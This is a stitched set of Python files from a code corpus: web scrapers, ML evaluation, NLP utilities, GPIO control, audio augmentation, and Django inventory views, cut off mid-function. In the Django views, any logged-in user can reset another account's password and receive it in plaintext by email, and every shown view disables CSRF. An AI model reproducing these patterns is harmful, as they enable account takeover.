match_dict\n","sub_path":"server/src/fbstoresort.py","file_name":"fbstoresort.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"208626158","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport csv\r\nimport requests\r\nstarturl = 'https://en.wikipedia.org/wiki/List_of_brown_dwarfs'\r\nbrowser = 
webdriver.Chrome('/Users/Poonam/OneDrive/Desktop/My Python/chromedriver')\r\nbrowser.get(starturl)\r\ntime.sleep(10)\r\nheaders = ['name','light_years_from_earth','planet_mass','stellar_magnitude','discovery_date','hyperlink','planet_type','planet_radius','orbital_radius','orbital_period','eccentricity']\r\nplanetdata = []\r\nnewplanetdata = []\r\ndef scrape():\r\n for i in range(1,433):\r\n while True:\r\n time.sleep(2)\r\n soup = BeautifulSoup(browser.page_source,'html.parser')\r\n currentpagenumber = int(soup.find_all('input',attrs = ['class','page_num'])[0].get('value'))\r\n if currentpagenumberi:\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[1]/a').click()\r\n else:\r\n break\r\n for ul_tag in soup.find_all('ul',attrs = {'class','exoplanet'}):\r\n li_tags = ul_tag.find_all('li')\r\n templist = []\r\n for index,li_tag in enumerate(li_tags):\r\n if index == 0:\r\n templist.append(li_tag.find_all('a')[0].contents[0])\r\n else:\r\n try:\r\n templist.append(li_tag.contents[0])\r\n except:\r\n templist.append('')\r\n hyperlinktag = li_tags[0]\r\n templist.append('https://en.wikipedia.org/wiki/List_of_brown_dwarfs'+hyperlinktag.find_all('a',href = True)[0]['href'])\r\n planetdata.append(templist)\r\n browser.find_element_by_xpath('https://en.wikipedia.org/wiki/List_of_brightest_stars_and_other_record_stars').click()\r\n print(f'{i}pagedone')\r\ndef scrapemoredata(hyperlink):\r\n try:\r\n page = request.get(hyperlink)\r\n soup = BeautifulSoup(page.content,'html.parser')\r\n templist = []\r\n for tr_tag in soup.find_all('tr',attrs = {'class':'fact_row'}):\r\n td_tags = tr_tag.find_all('td')\r\n for td_tag in td_tags:\r\n try:\r\n templist.append(td_tag.find_all('div',attrs = {'class':'value'})[0].contents[0])\r\n except:\r\n templist.append('')\r\n newplanetdata.append(templist)\r\n except:\r\n time.sleep(1)\r\n scrapemoredata(hyperlink)\r\nscrape()\r\nfor index,data in enumerate(planetdata):\r\n scrapemoredata(data[5])\r\n print(f'{index+1}pagedone2')\r\nfinalplanetdata = []\r\nfor index,data in enumerate(planetdata):\r\n newplanetdataelement = newplanetdata[index]\r\n newplanetdataelement = [elem.replace('\\n','')for elem in newplanetdataelement]\r\n newplanetdataelement = newplanetdataelement[:7]\r\n finalplanetdata.append(data+newplanetdataelement)\r\nwith open('final2.csv','w') as f:\r\n csvwriter = csv.writer(f)\r\n csvwriter.writerow(headers)\r\n csvwriter.writerows(finalplanetdata)","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"358814781","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nimport torch\nfrom new_dataset import myDataset, trainSearchDataset\nimport random\nfrom new_scoreAgent import scoreEvaluator_with_train\nfrom new_utils import render\nimport skimage\nfrom drn import drn_c_26\n\ndata_folder = '/local-scratch/fuyang/cities_dataset'\nbeam_width = 6\nbeam_depth = 10\nis_visualize = False\nis_save = True\nsave_path = '/local-scratch/fuyang/result/beam_search_v2/without_search_weak_constraint/'\nmax_epoch = 100\nedge_bin_size = 36\nbatch_size = 16\nphase = 'valid'\nedge_strong_constraint = False\n\ntrain_dataset = trainSearchDataset(data_folder, data_scale=1., phase=phase,\n edge_strong_constraint=edge_strong_constraint)\n\ntrain_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=1,\n 
shuffle=False,\n num_workers=1,\n drop_last=True)\n\n# evaluator_train is used for training\n# evaluator_search is used for searching\n# separate into two modules in order to use multiple threads to accelerate\nevaluator_train = scoreEvaluator_with_train('/local-scratch/fuyang/cities_dataset',\n backbone_channel=64, edge_bin_size=edge_bin_size)\n\nevaluator_train.to('cuda:0')\nevaluator_train.eval()\nevaluator_train.load_weight(save_path, '10')\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\n\ndef test(dataset, model, edge_bin_size):\n correct = 0\n total = 0\n model.eval()\n order = list(range(len(dataset)))\n for count, idx in enumerate(order):\n data = dataset.database[idx]\n name = data['name']\n print(name)\n corners = data['corners']\n edges = data['edges']\n corner_false_id = data['corner_false_id']\n edge_false_id = data['edge_false_id']\n\n img = skimage.img_as_float(plt.imread(os.path.join(data_folder, 'rgb', name+'.jpg')))\n #img = skimage.transform.rescale(img, self.data_scale, multichannel=True)\n img = img.transpose((2,0,1))\n img = (img - np.array(mean)[:, np.newaxis, np.newaxis]) / np.array(std)[:, np.newaxis, np.newaxis]\n\n mask = render(corners, edges, render_pad=-1)\n\n ### corner ###\n corner_gt_mask = render(corners[corner_false_id], np.array([]), render_pad=0)[1]\n\n ### edge ###\n edge_gt_mask = render(corners, edges[edge_false_id], render_pad=-1)\n edge_gt_mask = np.concatenate((edge_gt_mask, np.zeros((1,256,256))), 0).transpose((1,2,0))\n edge_input_masks = []\n for edge_i in range(edges.shape[0]):\n edge_input_masks.append(render(corners, edges[[edge_i]],render_pad=-1)[0:1][np.newaxis, ...])\n edge_input_masks = np.concatenate(edge_input_masks, 0)\n\n img = torch.FloatTensor(img).unsqueeze(0)\n mask = torch.FloatTensor(mask).unsqueeze(0)\n edge_input_masks = torch.FloatTensor(edge_input_masks)\n\n img = img.to(model.device)\n mask = mask.to(model.device)\n edge_input_masks = edge_input_masks.to(model.device)\n\n with torch.no_grad():\n img_volume = model.imgvolume(img)\n corner_pred = model.cornerEvaluator(mask, img_volume)\n edge_pred = model.edgeEvaluator(edge_input_masks,\n mask.expand(edge_input_masks.shape[0],-1,-1,-1),\n img_volume.expand(edge_input_masks.shape[0],-1,-1,-1),\n corner_pred.expand(edge_input_masks.shape[0],-1,-1,-1),\n torch.zeros(edge_input_masks.shape[0], edge_bin_size, device=model.device))\n\n # vis\n gt_data = train_dataset.ground_truth[name]\n gt_mask = render(gt_data['corners'], gt_data['edges'])\n gt_mask = np.concatenate((gt_mask, np.zeros((1,256,256))),0).transpose((1,2,0))\n\n corner_pred = corner_pred.cpu().numpy()\n edge_pred = edge_pred.cpu().numpy()\n edge_pred = np.exp(edge_pred) / np.exp(edge_pred).sum(1, keepdims=True)\n mask = mask.cpu().numpy()\n\n corner_pred = corner_pred[0,0]\n pred = []\n for edge_i in range(edge_pred.shape[0]):\n if edge_pred[edge_i, 1] > 0.7:\n pred.append(edge_i)\n\n edge_result = render(corners, edges[pred], render_pad=-1)\n edge_result = np.concatenate((edge_result, np.zeros((1,256,256))), 0).transpose((1,2,0))\n\n mask = np.concatenate((mask[0], np.zeros((1,256,256))), 0).transpose((1,2,0))\n corner_gt_mask = corner_gt_mask\n\n # metric\n total += edges.shape[0]\n for edge_i in range(edges.shape[0]):\n if edge_i in edge_false_id and edge_i in pred:\n correct += 1\n elif edge_i not in edge_false_id and edge_i not in pred:\n correct += 1\n\n\n # vis\n plt.figure(figsize=(6.4, 3.9))\n img = skimage.img_as_float(plt.imread(os.path.join(data_folder, 'rgb', name+'.jpg')))\n 
plt.subplot(2,4,1)\n plt.imshow(img)\n plt.subplot(2,4,2)\n plt.imshow(mask)\n plt.subplot(2,4,3)\n plt.imshow(gt_mask)\n plt.subplot(2,4,4)\n plt.imshow(corner_pred)\n plt.title('corner')\n plt.subplot(2,4,5)\n plt.imshow(corner_gt_mask)\n plt.title('corner gt')\n plt.subplot(2,4,6)\n plt.imshow(edge_result)\n plt.title('edge')\n plt.subplot(2,4,7)\n plt.imshow(edge_gt_mask)\n plt.title('edge gt')\n #plt.subplots_adjust(wspace=0.1, hspace=0.1)\n plt.show()\n #plt.savefig(os.path.join(phase, str(count)+'.jpg'), dpi=300)\n plt.close()\n\n print(correct / total)\n\n\ntest(train_dataset, evaluator_train, edge_bin_size)\n\n# iter valid train\n# 1 0.63 0.61\n# 2 0.70 0.74\n# 5 0.72 0.81\n# 10 0.74 0.88\n# 17 0.74 0.93\n# 30 0.75 0.96","sub_path":"new_scoreAgent_test.py","file_name":"new_scoreAgent_test.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"523857964","text":"#!/usr/bin/python\n# -*- coding:UTF-8 -*-\n\n################################################################################\n#\n# Copyright 2010-2014 Carlos Ramisch, Vitor De Araujo, Silvio Ricardo Cordeiro,\n# Sandra Castellanos\n#\n# mweoccur.py is part of mwetoolkit\n#\n# mwetoolkit is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# mwetoolkit is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with mwetoolkit. If not, see .\n#\n################################################################################\n\"\"\"\nThis module provides the `MWEOccurrence` class. This class represents an\noccurrence of an MWE `Candidate` inside a `Sentence`.\n\"\"\"\n\n################################################################################\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\n\n\n\nclass MWEOccurrence(object):\n r\"\"\"Represents the occurrence of an MWE candidate in a sentence.\n\n Constructor Arguments:\n @param sentence The sentence in this occurrence.\n @param candidate The MWE candidate in this occurrence.\n @param indexes A list of indexes that represent the position of\n each word from `self.candidate` in `self.sentence`.\n This list will be `list(xrange(i, i + len(self.candidate)))` when\n referring to the simplest kinds of MWEs. If the MWE in-sentence has\n different word order (e.g. passive voice in English), a permutation of\n those indexes will be used. 
If there are gaps inside the MWE (e.g.\n verb-particle compounds in English), other sentence indexes may be used.\n IMPORTANT: This list is 0-based in python but 1-based in XML.\n\n Examples:\n Today , a demo was given Sentence\n ~ ~~~~ ~~~~~ Candidate = \"give a demo\"\n _ _ 2 3 _ 5 indexes = [5, 2, 3]\n\n The old man kicked the proverbial bucket Sentence\n ~~~~~~ ~~~ ~~~~~~ Candidate = \"kick the bucket\"\n _ _ _ 3 4 _ 6 indexes = [3, 4, 6]\n \"\"\"\n def __init__(self, sentence, candidate, sentence_indexes):\n for s_i in sentence_indexes:\n if not (0 <= s_i < len(sentence)):\n raise Exception(\"Candidate %r references bad word \" \\\n \"index: Sentence %r, index %r.\" % (\n candidate.id_number, sentence.id_number, s_i+1))\n self.candidate = candidate\n self.sentence = sentence\n self.indexes = sentence_indexes\n\n def to_xml(self):\n # NOTE: the XML tag literals below were stripped from this file during\n # text extraction; the tags are a plausible reconstruction based on the\n # class docstring (candidate id attribute, 1-based word indexes).\n ret = ['<mweoccur candid=\"' + str(self.candidate.id_number) + '\">']\n # For each (candidate index, sentence index)...\n for c_i, s_i in enumerate(self.indexes):\n ret.append('<mwepart index=\"' + str(s_i + 1) + '\"/>')\n #ret.append(self.sentence[s_i].lemma_or_surface())\n #ret.append('</mwepart>')\n ret.append(\"</mweoccur>\")\n return ''.join(ret)\n\n################################################################################\n\nclass MWEOccurrenceBuilder(object):\n r\"\"\"MWEOccurrenceBuilder's can be filled up with data\n to create an instance of MWEOccurrence.\n\n Constructor Arguments:\n @param sentence Will become `MWEOccurrence.sentence`.\n @param candidate Will become `MWEOccurrence.candidate`.\n @param n_gaps Number of remaining gaps allowed inside\n the indexes of the MWEOccurrence (see `fill_next_slot`) .\n \n Attributes:\n @param indexes Will become `MWEOccurrence.indexes`.\n \"\"\"\n def __init__(self, sentence, candidate, n_gaps=None):\n self.sentence = sentence\n self.candidate = candidate\n self.n_gaps = n_gaps or 0\n self.indexes = [] # similar to JMWE's `MWEBuilder.slot`\n\n def is_full(self):\n r\"\"\"Return whether the builder is ready to create an MWEOccurrence.\"\"\"\n # Similar to JMWE's `MWEBuilder.isFull`.\n assert len(self.indexes) <= len(self.candidate)\n return len(self.indexes) == len(self.candidate)\n\n def match_key(self, word_obj):\n r\"\"\"Return some `key(word_obj)` for comparison at `self.match`.\"\"\"\n raise NotImplementedError\n\n def match(self, index_sentence, index_candidate):\n r\"\"\"Return whether we should fill position\n `index_candidate` with the word in `index_sentence`.\"\"\"\n # Similar to JMWE's `IMWEDesc.isFillerForSlot`.\n s_word = self.sentence[index_sentence]\n c_word = self.candidate[index_candidate]\n return self.match_key(s_word) == self.match_key(c_word)\n\n def fill_next_slot(self, index_sentence):\n r\"\"\"Try the following things, in order:\n -- If possible to fill next index slot, do it by\n appending an index from sentence to this builder\n and return non-False \"FILLED\".\n -- If possible to insert a gap, ignore this index\n and return non-False \"GAP\".\n -- Return False.\n \"\"\"\n # Similar to JMWE's `MWEBuilder.fillNextSlot`.\n assert index_sentence < len(self.sentence)\n index_candidate = len(self.indexes)\n if self.is_full():\n return False # Cannot match anything else\n if self.match(index_sentence, index_candidate):\n self.indexes.append(index_sentence)\n return \"FILLED\"\n if self.n_gaps > 0 and index_candidate != 0:\n self.n_gaps -= 1\n return \"GAP\"\n return False\n\n def checked_fill_next_slot(self, index_sentence):\n r\"\"\"Call `fill_next_slot` and raise if it returns False.\"\"\"\n if not self.fill_next_slot(index_sentence):\n raise Exception(\"Unable to fill next slot!\")\n\n def 
create(self):\n r\"\"\"Create an MWEOccurrence object.\"\"\"\n if not self.is_full():\n raise Exception(\"MWEOccurrence not ready to be created\")\n return MWEOccurrence(self.sentence, self.candidate, self.indexes)\n \n def __repr__(self):\n return b\" \".join(w.lemma_or_surface().encode('utf8')\n for w in self.candidate)\n\n \n################################################################################\n \nif __name__ == \"__main__\" :\n import doctest\n doctest.testmod() \n","sub_path":"LANGAGE_NATUREL/Nazim/TP1/bin/mwetoolkit/bin/libs/base/mweoccur.py","file_name":"mweoccur.py","file_ext":"py","file_size_in_byte":6782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147035332","text":"import RPi.GPIO as GPIO\nimport time\n\nclass Pump():\n def __init__(self):\n self.name = None\n self.pin = None\n GPIO.setmode(GPIO.BCM)\n\n \n def set_name(self, name):\n self.name = str(name)\n \n def set_pin(self, pin):\n try:\n # accept numeric or string input; valid BCM pins run from 1 to 27\n pin = float(pin)\n if pin.is_integer() and 0 < pin <= 27:\n self.pin = int(pin)\n GPIO.setup(self.pin, GPIO.OUT)\n GPIO.output(self.pin, GPIO.HIGH)\n except (TypeError, ValueError):\n print(\"Must be a valid integer\")\n\n def do(self, t):\n if self.pin is not None:\n GPIO.output(self.pin, GPIO.LOW)\n time.sleep(t)\n GPIO.output(self.pin, GPIO.HIGH)\n else:\n print(\"Must set GPIO pin for %s\" % self.name)\n\n \n ","sub_path":"ceaos_pump/pump.py","file_name":"pump.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"518340699","text":"import random\nimport numpy as np\nfrom scipy import signal\nimport sys\nimport os\nimport soundfile as sf\n\n# Load support lib\nfrom supplib import ReadList\nfrom supplib import copy_folder\nfrom supplib import load_IR\nfrom supplib import shift\n\n# Reading input arguments\nin_folder=sys.argv[1] # input folder\nout_folder=sys.argv[2] # output folder\nlist_file=sys.argv[3] # list file (\"wav_file IR_file\")\n\n\n# Read List file\n[list_sig,list_ir,list_bck_noise]=ReadList(list_file)\n\n# Replicate input folder structure to output folder\ncopy_folder(in_folder,out_folder)\n\n# Speech Data Reverberation Loop\nfor i in range(len(list_sig)): \n \n # Open clean wav file\n #[fs, signal_clean] = wavfile.read(list_sig[i])\n [signal_clean, fs] = sf.read(list_sig[i])\n\n signal_clean=signal_clean.astype(np.float64)\n\n # Signal normalization (divide by the absolute peak)\n signal_clean=signal_clean/np.max(np.abs(signal_clean))\n \n # Open background_noise signal\n \n [background_noise, fs1] = sf.read(list_bck_noise[i])\n background_noise=background_noise.astype(np.float64)\n background_noise=background_noise.flatten()\n # background_noise normalization\n \n background_noise=background_noise/np.max(np.abs(background_noise))\n\n # Open Impulse Response (IR)\n\n IR=load_IR(list_ir[i])\n\n # IR normalization\n IR=IR/np.max(np.abs(IR))\n p_max=np.argmax(np.abs(IR))\n \n signal_rev=signal.fftconvolve(signal_clean, IR, mode='full')\n\n # Normalization\n signal_rev=signal_rev/np.max(np.abs(signal_rev))\n \n # IR delay compensation\n signal_rev=shift(signal_rev, -p_max)\n\n # Cut reverberated signal (same length as clean sig)\n signal_rev=signal_rev[0:signal_clean.shape[0]]\n\n #add background noise to reverberated signal\n b = len(signal_rev)\n a = len(background_noise)\n c = random.randint(0,a-b)\n d = background_noise[c:c+b]\n signal_rev_add_noise = d + signal_rev\n \n # Save Reverberated Speech\n file_out=list_sig[i].replace(in_folder, out_folder)\n 
#wavfile.write(file_out,fs,signal_rev)\n sf.write(file_out, signal_rev_add_noise, fs)\n \n print(\"Done %s\" % (file_out))\n\n\n\n\n\n","sub_path":"add_noise.py","file_name":"add_noise.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"594205441","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.views import View\nfrom django.contrib import messages\nfrom .models import Sales,Store,Employee,Company,Customer,Inventory,Item,Account,Expense\nfrom .forms import ItemForm\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import send_mail\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Count, F, Value\n\nimport csv\n# Create your views here.\n\npathselector={1:'base',2:'base',3:'order',4:'expense',5:'counter'}\n\nprivillage={'sales':3,'admin':1,'assistantadmin':2,'bursar':4,'godown':5}\n# hnishael@gmail.com\n\nimport datetime\nfrom inventory.utils import render_to_pdf ,render_to_pdf_with_image #created in step 4\nfrom django.template.loader import get_template\nfrom django.db.models import Sum\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.db.models import Avg,Sum\nfrom datetime import timedelta\nfrom django.utils import timezone\n\ndef delete_recovery(object):\n\tpass\n\ndef soft_delete(object):\n\tpass\n\ndef check_correct_uniqueness():\n\t# list for holding the customers' names while going throught them in the database\n\ttempcustomer=[]\n\n\t# using raw query so as to by bass the deliberate limitation that were overidden in the model class of not getting all the rows within an entitty \n\n\t# getting all customers, deleted(dead) and not deleted( alive)\n\tcustomers = Customer.objects.raw('select * from inventory_customer where deleted_at is not null or deleted_at is null')\n\n\t# going through the customers\n\tfor index,customer in enumerate(customers):\n\t\tprint(\"Customer: \"+str(index))\n\t\t# check if the list contains a customer name\n\t\tif tempcustomer.__contains__(customer.customer_name):\n\t\t\t# if yes\n\t\t\t# modify the customer name and store it temporarly\n\t\t\tnew_customer_name=customer.customer_name+str(tempcustomer.count(customer.customer_name))\n\n\t\t\tcount=0\n\n\t\t\t# check if the newly modifed customer is in the list also\n\t\t\twhile(tempcustomer.__contains__(new_customer_name)):\n\t\t\t\t# if yes modify the new customer name till its is not found in the list\n\t\t\t\tnew_customer_name=new_customer_name+str(count)\n\t\t\t\tcount+=1\n\n\t\t\t# now add the new customer name to the customer list\n\t\t\ttempcustomer.append(new_customer_name)\n\t\t\t# modify the customer name in the database to the new customer name\n\t\t\tcustomer.customer_name=new_customer_name\n\t\t\t# save the customer \n\t\t\tcustomer.save()\n\t\t\t\n\t\telse:\n\t\t\t# if customer name not in list \n\t\t\t# add it to the customer list\n\t\t\ttempcustomer.append(customer.customer_name)\n\n\tprint('done')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef getGraphBata(request, *args, **kargs):\n\t# 
check_correct_uniqueness()\n\tprint('graph')\n\tdays_dict={1:'Monday',2:'Tuesday',3:'Wednesday',4:'Thursday',5:'Friday',6:'Sartuday',7:'Sunday'}\n\n\tdef deltaSelect(day):\n\t\tdelta=datetime.date.today().isocalendar()[2]-day\n\t\tprint(delta)\n\t\tif delta<0:\n\t\t\tprint(delta)\n\t\t\tdelta=7+delta\n\t\treturn delta\n\n\tsunday=datetime.date.today()-timedelta(days=deltaSelect(0))\n\tmonday=datetime.date.today()-timedelta(days=deltaSelect(1))\n\ttuesday=datetime.date.today()-timedelta(days=deltaSelect(2))\n\twednesday=datetime.date.today()-timedelta(days=deltaSelect(3))\n\tthursday=datetime.date.today()-timedelta(days=deltaSelect(4))\n\tfriday=datetime.date.today()-timedelta(days=deltaSelect(5))\n\tsartuday=datetime.date.today()-timedelta(days=deltaSelect(6))\n\t\n\tsunday_sales=Sales.objects.filter(created_at__gte=sunday,created_at__lt=sunday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tmonday_sales=Sales.objects.filter(created_at__gte=monday,created_at__lt=monday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\ttuesday_sales=Sales.objects.filter(created_at__gte=tuesday,created_at__lt=tuesday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\twednesday_sales=Sales.objects.filter(created_at__gte=wednesday,created_at__lt=wednesday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tthursday_sales=Sales.objects.filter(created_at__gte=thursday,created_at__lt=thursday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tfriday_sales=Sales.objects.filter(created_at__gte=friday,created_at__lt=friday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tsartuday_sales=Sales.objects.filter(created_at__gte=sartuday,created_at__lt=sartuday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tprint('today')\n\tprint(datetime.datetime.now())\n\tprint('iso calender position for today')\n\tprint(datetime.date.today().isocalendar()[2])\n\n\ttoday_sales=Sales.objects.filter(created_at__gte=datetime.date.today(),created_at__lt=datetime.date.today()+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tprint('today\\'s date:{}'.format(datetime.date.today()))\n\tprint('today:{}'.format(today_sales))\n\tprint('Date monday:{}'.format(monday))\n\tprint(\"Sales monday:{}\".format(monday_sales))\n\tprint('Date tuesday:{}'.format(tuesday))\n\tprint(\"Sales tuesday:{}\".format(tuesday_sales))\n\tprint('Date wednesday:{}'.format(wednesday))\n\tprint(\"Sales wednesday:{}\".format(wednesday_sales))\n\tprint('Date thursday:{}'.format(thursday))\n\tprint(\"Sales thursday:{}\".format(thursday_sales))\n\tprint('Date friday:{}'.format(friday))\n\tprint(\"Sales friday:{}\".format(friday_sales))\n\tprint('Date sartuday:{}'.format(sartuday))\n\tprint(\"Sales sartuday:{}\".format(sartuday_sales))\n\tprint('Date sunday:{}'.format(sunday))\n\tprint(\"Sales sunday:{}\".format(sunday_sales))\n\t\n\tdata_to_display=arrrange_days_forgraph(days=[\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Sartuday\",\"Sunday\"],data=[monday_sales,tuesday_sales,wednesday_sales,thursday_sales,friday_sales,sartuday_sales,sunday_sales])\n\n\tdata = {\n\t 'data': data_to_display[\"values\"],\n\n\t 'label':data_to_display[\"days\"],\n\t 'order_id': 1233434,\n\t}\n\t\n\treturn JsonResponse(data)\n\n\ndef arrrange_days_forgraph(data=None,days=None):\n\tdays_value=[]\n\tarranged_days=[]\n\t\n\tdays_position=[]\t\n\t# getting sequence of the previous 
days\n\tfor index in range(7):\n\t\tdays_position.append((datetime.date.today()-timedelta(days=index)).isocalendar()[2])\n\n\tprint(\"position of says in sequence\")\n\tprint(days_position)\t\n\n\t# arranging the days in appropriate sequence\n\tfor position in days_position:\n\t\tprint(position)\n\t\tarranged_days.append(days[position-1])\n\n\tprint(\"new arranged days\")\n\tprint(list(reversed(arranged_days)))\n\n\t# the values in appropiate sequence\n\tfor position in days_position:\n\t\tprint(position)\n\t\tif data[position-1] is None:\n\t\t\tdata[position-1]=0\n\t\t\tprint(0)\n\t\tdays_value.append(data[position-1])\n\n\tprint(\"new arranged data\")\n\tprint(list(reversed(days_value)))\n\n\t# define a function that goes down to zero from today's iso value\n\n\t# define a function that goes down to todays iso value from the maximum value\n\n\t# oneach funciton append the values to the approrpiacte list for return to the frontend graph for drawing \n\n\treturn {\"days\":list(reversed(arranged_days)),\"values\":list(reversed(days_value))}\n\t\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef OrderPdf(request, *args, **kwargs):\n\tprint('oldpdf')\n\n\tdata = {\n\t 'today': datetime.date.today(), \n\t 'amount': 39.99,\n\t 'customer_name': 'Cooper Mann',\n\t 'order_id': 1233434,\n\t}\n\n\tpdf = render_to_pdf('inventory/pdforder.html', data)\n\treturn HttpResponse(pdf, content_type='application/pdf')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef OrderPdf_Auto(request, *args, **kwargs):\n\tcustomer=Customer.objects.get(id=kwargs['id'])\n\tif request.user.employee.employee_privillage<=privillage['assistantadmin']:\n\t\tsales=Sales.objects.filter(Q(sales_authorized=False )|Q(sales_method_payment='loan'),customer=customer)\n\telse:\n\t\tuser=request.user\n\n\t\tsales=Sales.objects.filter(sales_received=False,user=request.user,customer=customer)\n\temployee= Employee.objects.get(user=request.user)\n\titems = Item.objects.all()\n\ttotal=sales.aggregate(Sum('sales_amount'))\n\tprint(total)\n\n\tprint('custoemrid')\n\tprint(kwargs['id'])\n\ttemplate = get_template('inventory/pdforder.html')\n\tcontext = {\n\t\"logo\":\"/static/inventory/oceanicpicjpg.png\",\n\t \"order_id\": 123,\n\t \"customer_name\": \"John Cooper\",\n\t \"amount\": 1399.99,\n\t \"today\": datetime.date.today(),\n\t 'orders':sales,\n\t 'customer':customer,\n\t 'items':items,\n\t 'employee':employee,\n\t 'amount':'Tsh {:,.2f}'.format(total['sales_amount__sum']),\n\t}\n\n\thtml = template.render(context)\n\tpdf = render_to_pdf_with_image('inventory/pdforder.html', context)\n\n\tif pdf:\n\t\tresponse = HttpResponse(pdf, content_type='application/pdf')\n\t\tfilename = \"{}_{}_Order.pdf\".format(customer.customer_name,datetime.date.today())\n\t\tcontent = \"inline; filename='%s'\" %(filename)\n\t\tdownload = request.GET.get(\"download\")\n\t\tif download:\n\t\t\tcontent = \"attachment; filename='%s'\" %(filename)\n\t\tresponse['Content-Disposition'] = content\n\t\treturn response\n\treturn HttpResponse(\"Not found\")\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef resetPassword(request,*args,**kargs):\n\n\tuser= User.objects.get(id=kargs['id'])\n\n\tprint('gotcha create something')\n\timport random\n\timport string\n\n\tdef generateRoandom(size=4,chars=string.ascii_lowercase+string.ascii_uppercase+string.digits):\n\n\t\treturn ''.join(random.choice(chars) for _ in 
range(size))\n\n\tpassword=generateRoandom(8)\n\n\tuser.set_password(password)\n\tuser.save()\n\temployee=Employee.objects.get(user=user.id)\n\n\tadmin = Employee.objects.filter(employee_privillage=1)\n\n\t# email=admin.first().employee_email\n\n\temail=User.objects.get(id=request.user.id).employee.employee_email\n\t\n\n\t# sending login credentials to the admin or the user themselves\n\tsend_mail(\n\t\t 'Resetting Password',\n\t\t 'OCEANIC \\n firstname :'+employee.employee_firstname+'\\n'+'username :'+user.username+'\\n password: '+password,\n\t\t 'info.company.tz@gmail.com',\n\t\t [email],\n\t\t fail_silently=False,\n\t\t \n\t\t)\n\n\treturn HttpResponse('done')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef ChangePassword(request,*args,**kargs):\n\tuser = authenticate(request, username=kargs['username'], password=kargs['oldpassword'])\n\n\tif user is not None:\n\n\t\tif kargs['firstnewpassword'] == kargs['secondnewpassword']:\t\t\n\t\t\tuser.set_password(kargs['firstnewpassword'])\n\t\t\tuser.save()\n\t\t\treturn HttpResponse('good')\n\t\telse:\n\t\t\treturn HttpResponse('notmatched')\n\n\telse:\n\t\treturn HttpResponse('badold')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef ChangeUsername(request,*args,**kargs):\n\ttry:\n\t\tuser=User.objects.get(username=kargs['username'])\n\n\texcept Exception as e:\n\t\tUser.objects.filter(id=kargs['id']).update(username=kargs['username'])\n\t\treturn HttpResponse('good')\n\telse:\n\t\treturn HttpResponse('bad')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef ItemFile(request,*args,**kargs):\n\n\t# with open(request.FILES['file'],'r') as csv_file:\n\tcsv_file=request.FILES['file']\n\tprint(csv_file.name.endswith('csv'))\n\n\tfile_data=csv_file.read().decode('utf-8')\n\tlines=file_data.split('\\n')\n\t# line_dict=get_lines_dict(lines)\n\n\t# work on this function so as to allow flexibility of csv upload\n\tfor counter, line in enumerate(lines):\n\t\tif counter == 0:\n\t\t\tcontinue\n\t\tfields=line.split(',')\n\t\t\n\t\tif(len(fields)<2):\n\t\t\tprint(fields)\n\t\telse:\n\t\t\tprint(counter)\n\t\t\texistimg_item,new_item=Item.objects.get_or_create(store=Store.objects.get(id=request.POST['store']),item_name=fields[0],item_size=fields[1])\n\t\t\t# new_customer.save()\n\tprint(\"Done, items stored\")\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef CustomerFile(request,*args,**kargs):\n\n\t# with open(request.FILES['file'],'r') as 